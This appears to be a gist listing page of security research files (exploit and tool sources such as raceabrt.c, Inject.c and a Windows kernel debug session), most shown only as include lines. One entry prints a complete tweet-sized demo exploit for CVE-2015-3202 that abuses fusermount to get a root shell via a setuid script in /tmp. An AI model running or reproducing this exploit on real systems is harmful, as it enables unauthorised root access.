View slow.asm
00000000 DBE3 fninit
00000002 D9EB fldpi
00000004 D9EB fldpi
00000006 D9EB fldpi
00000008 D9EB fldpi
0000000A D9EB fldpi
0000000C D9EB fldpi
0000000E D9EB fldpi
00000010 D9EB fldpi
00000012 D9EB fldpi
View CVE-2015-3202
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;
# $b is used twice, first to build the contents of shellscript $a, and then as
View raceabrt.c
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdio.h>
#include <signal.h>
#include <err.h>
#include <string.h>
#include <alloca.h>
#include <limits.h>
#include <sys/inotify.h>
View newpid.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
View Inject.c
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#include <winnt.h>
View SetPalette.c
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#include <winnt.h>
View rebinder.c
#include <stdlib.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <time.h>
View gist:5103409
kd> vertarget
Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 9200.16496.x86fre.win8_gdr.130108-1504
Machine Name:
Kernel base = 0x8141a000 PsLoadedModuleList = 0x81604e68
Debug session time: Wed Mar 6 13:48:32.556 2013 (UTC - 8:00)
System Uptime: 0 days 0:04:22.991
kd> .lastevent
Last event: Access violation - code c0000005 (!!! second chance !!!)
View pmftool.c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdbool.h>
#include <iconv.h>
#include <string.h>
#include <assert.h>
// Quick utility to generate Process Monitor filter sets for testing.
// Tavis Ormandy <taviso@cmpxchg8b.com>
View ScaleWindow.c
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <stddef.h>
#include <winnt.h>
#include <limits.h>